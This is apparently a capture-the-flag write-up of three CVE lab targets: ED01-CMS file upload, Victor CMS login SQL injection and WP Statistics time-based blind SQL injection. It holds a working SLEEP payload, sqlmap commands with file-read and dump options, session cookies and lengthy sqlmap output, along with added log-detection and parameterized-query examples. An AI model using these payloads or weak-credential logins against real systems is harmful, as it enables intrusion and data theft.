CVE-2022-28525
Target description: ED01-CMS v20180505 has an arbitrary file upload vulnerability.
Seeing a login form, I habitually tried the weak credentials admin / admin; the login succeeded and dropped me straight into the admin panel.
The file upload point is under Posts > Add Post.
Then just cat /flag to get the flag.
CVE-2022-28060
Target description: Victor CMS v1.0 has a SQL injection in /includes/login.php.
For the SQL injection, just run it through sqlmap: first log in once and capture the request to find the parameter names for the username and password.
sqlmap -r <request file> --batch
Running that command alone gets the result, though it is a bit slow since the injection is boolean-based blind. Then run sqlmap -r <request file> --batch --file-read "/flag"
which dumps the contents of the flag file. (On 春秋云境 (ichunqiu) ranges the flag is usually at /flag; here we also assume the database user we are running as meets the prerequisites for load_file, which is why we go straight to --file-read "<file path>".)
CVE-2022-4230
Target description: versions of the WP Statistics WordPress plugin before 13.2.9 do not escape a parameter, which may allow an authenticated user to perform SQL injection. By default the affected feature is available to users with the Manage Options capability (admin+), but the plugin has a setting that also lets low-privileged users access it.
Visiting the target shows an empty initial page; a quick search shows that the WordPress admin panel route is /wp-admin/admin.php. Opening it brings up the login page, so I just brute-forced weak credentials.
/wp-json/wp-statistics/v2/metabox?_wpnonce=452a20ab61&name=words&search_engine=aaa' AND (SELECT 5671 FROM (SELECT(SLEEP(5)))Mdgs)-- HsBR
Save the request (delete the payload from search_engine here, otherwise sqlmap fails to find the injection):
GET /wp-json/wp-statistics/v2/metabox?_wpnonce=452a20ab61&name=words&search_engine=aaa HTTP/1.1
Host: eci-2zej9c5h4qkz1lhh3rwl.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_0c4cf6eb6832e318abc67fee8352d62f=test%7C1743678978%7CLECKpEdgZNaM537AbSD1WI0D219sFpe00OWwpMgjhsR%7Cfc855e26fae16001173dffde835bfc0a0c7bc8f0ee351c24cf903ab5dd0ec61e; wp_lang=zh_CN; wp-settings-time-1=1743506186
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Save it as 333.txt, then run sqlmap:
sqlmap -r 333.txt --technique=T --dbms="MySQL" --dbs --exclude-sysdbs
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:44:56 /2025-04-01/
[19:44:56] [INFO] parsing HTTP request from '333.txt'
[19:44:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_engine (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: _wpnonce=452a20ab61&name=words&search_engine=aaa' AND (SELECT 6493 FROM (SELECT(SLEEP(5)))KFHy) AND 'Yiyf'='Yiyf
---
[19:44:56] [INFO] testing MySQL
[19:44:56] [INFO] confirming MySQL
[19:44:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[19:44:56] [INFO] fetching database names
[19:44:56] [INFO] fetching number of databases
[19:44:56] [INFO] resumed: 4
[19:44:56] [INFO] resuming partial value: informatio
[19:44:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]y
[20:12:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[20:12:44] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:12:54] [INFO] adjusting time delay to 1 second due to good response times
n_schemda
[20:13:23] [INFO] retrieved: mysql
[20:13:42] [INFO] retrieved: performance_schema
[20:14:50] [INFO] retrieved: wordpress
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress
[20:15:26] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zej9c5h4qkz1lhh3rwl.cloudeci1.ichunqiu.com'
[*] ending @ 20:15:26 /2025-04-01/
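The time-based blind probes sqlmap just sent (the SLEEP(5) payload in search_engine) leave two traces in the web server's access log: a delay function inside a parameter value, and an unusually long response time on exactly that request. The script below is an added detection example, not part of the original writeup and not sqlmap's or WP Statistics' code. The log lines are constructed: the payload and nonce are the ones shown above, while the IPs, timestamps, the request_time field and the log format itself (assumed to be nginx combined format with $request_time appended) are made up for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed nginx-style access log excerpt (not the target's real log).
# Assumed format: ip - - [time] "METHOD target PROTO" status bytes "referer" "ua" request_time
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2025:19:44:56 +0800] "GET /wp-json/wp-statistics/v2/metabox?_wpnonce=452a20ab61&name=words&search_engine=google HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.041
10.0.0.5 - - [01/Apr/2025:19:44:57 +0800] "GET /wp-json/wp-statistics/v2/metabox?_wpnonce=452a20ab61&name=words&search_engine=aaa%27%20AND%20%28SELECT%206493%20FROM%20%28SELECT%28SLEEP%285%29%29%29KFHy%29%20AND%20%27Yiyf%27%3D%27Yiyf HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5.093
10.0.0.5 - - [01/Apr/2025:19:44:58 +0800] "GET /includes/login.php HTTP/1.1" 200 1024 "-" "sqlmap/1.9.2#stable (https://sqlmap.org)" 0.052
10.0.0.7 - - [01/Apr/2025:19:45:01 +0800] "GET /?s=sleep+well HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 0.030
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$')

# Patterns checked against each URL-decoded query parameter value.
INDICATORS = [
    ("time-delay function", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("quote-break with boolean operator", re.compile(r"'\s*(and|or)\b", re.I)),
    ("inline SQL comment", re.compile(r"--|/\*")),
]


def parse_line(line):
    """Split one access-log line into fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    return rec


def analyze_log(text, slow_threshold=4.0):
    """Flag requests whose query strings carry injection markers. A slow response
    on a request that contains a delay function corroborates a time-based probe
    (the 4 s threshold is an assumption chosen below the SLEEP(5) seen above)."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        url = urlsplit(rec["target"])
        # parse_qsl percent-decodes values, so %27 and %28 become ' and (
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            for label, rx in INDICATORS:
                if rx.search(value):
                    reasons.append(f"{label} in parameter '{name}'")
        if "sqlmap" in rec["ua"].lower():
            reasons.append("scanner user-agent")
        if rec["rt"] >= slow_threshold and any(r.startswith("time-delay") for r in reasons):
            reasons.append(f"response took {rec['rt']:.1f}s, consistent with the delay probe")
        if reasons:
            findings.append({"ip": rec["ip"], "time": rec["ts"],
                             "path": url.path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['path']}")
        for r in f["reasons"]:
            print("   -", r)
```

The benign fourth line ("sleep well" with no opening parenthesis) is there to show that the delay indicator keys on the function-call form rather than the bare word; in a real deployment the timing check matters most, because a payload that is obfuscated past the regexes still has to make the server wait.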
Having found the sensitive database wordpress, specify the database and list its tables:
sqlmap -r 333.txt --technique=T --dbms="MySQL" --exclude-sysdbs -D wordpress -T "flag" --tables
___
__H__
___ ___[)]_____ ___ ___ {1.9.2#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:38:38 /2025-04-01/
[20:38:38] [INFO] parsing HTTP request from '333.txt'
[20:38:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_engine (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: _wpnonce=452a20ab61&name=words&search_engine=aaa' AND (SELECT 6493 FROM (SELECT(SLEEP(5)))KFHy) AND 'Yiyf'='Yiyf
---
[20:38:39] [INFO] testing MySQL
[20:38:39] [INFO] confirming MySQL
[20:38:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[20:38:39] [INFO] fetching tables for database: 'wordpress'
[20:38:39] [INFO] fetching number of tables for database 'wordpress'
[20:38:39] [INFO] resumed: 34
[20:38:39] [INFO] resumed: wp_statistics_pages
[20:38:39] [INFO] resumed: wp_statistics_visitor
[20:38:39] [INFO] resumed: wp_terms
[20:38:39] [INFO] resumed: wp_learnpress_section_items
[20:38:39] [INFO] resumed: wp_statistics_useronline
[20:38:39] [INFO] resumed: wp_posts
[20:38:39] [INFO] resumed: wp_learnpress_question_answermeta
[20:38:39] [INFO] resumed: wp_term_taxonomy
[20:38:39] [INFO] resumed: wp_usermeta
[20:38:39] [INFO] resumed: wp_termmeta
[20:38:39] [INFO] resumed: wp_statistics_historical
[20:38:39] [INFO] resumed: wp_commentmeta
[20:38:39] [INFO] resumed: wp_learnpress_sections
[20:38:39] [INFO] resumed: wp_thim_cache
[20:38:39] [INFO] resumed: wp_options
[20:38:39] [INFO] resumed: wp_users
[20:38:39] [INFO] resumed: wp_learnpress_user_item_results
[20:38:39] [INFO] resumed: wp_learnpress_sessions
[20:38:39] [INFO] resumed: wp_learnpress_order_items
[20:38:39] [INFO] resuming partial value: wp_postme
[20:38:39] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[20:38:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[20:39:05] [INFO] adjusting time delay to 1 second due to good response times
ta
[20:39:11] [INFO] retrieved: flag
[20:39:28] [INFO] retrieved: wp^C
[*] ending @ 20:39:41 /2025-04-01/
Then run sqlmap -r 333.txt --technique=T --dbms="MySQL" --exclude-sysdbs -D wordpress -T flag --columns to find the column name flag, and sqlmap -r 333.txt --technique=T --dbms="MySQL" --exclude-sysdbs -D wordpress -T flag -C flag --dump to get the flag's contents.
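The root cause shared by the Victor CMS login injection and the WP Statistics search_engine injection above is the same: user input spliced into the SQL text instead of bound as a parameter. The following Python/sqlite3 snippet is an added illustration, not code from either project; the users table, its column names and the stored credential are constructed for the example and do not reproduce either project's real schema. It shows the concatenating version losing its password check to a quote followed by a comment, while the parameterized version treats the identical input as a literal string.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a CMS user table (table and column names are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, user_password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def login_concat(conn, username, password):
    """Vulnerable pattern: credentials are spliced into the SQL text, so a quote
    in the input changes the statement the database actually executes."""
    sql = ("SELECT COUNT(*) FROM users WHERE user_name = '" + username +
           "' AND user_password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn, username, password):
    """Hardened pattern: placeholders are bound as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE user_name = ? AND user_password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def compare(username, password):
    """Run the same input through both versions and report what each returns."""
    conn = make_db()
    try:
        return {"concat": login_concat(conn, username, password),
                "param": login_param(conn, username, password)}
    finally:
        conn.close()


if __name__ == "__main__":
    print("valid credentials:", compare("admin", "S3cret!"))
    print("wrong password:   ", compare("admin", "guess"))
    # A quote followed by an SQL comment cuts the password check off the end of
    # the concatenated statement; the bound version simply looks up that literal.
    print("quote-break input:", compare("admin' -- ", "guess"))
```

The same fix applies on the WordPress side: the plugin's query should pass search_engine through $wpdb->prepare() rather than building the WHERE clause by hand, which is what the 13.2.9 release addresses according to the description above.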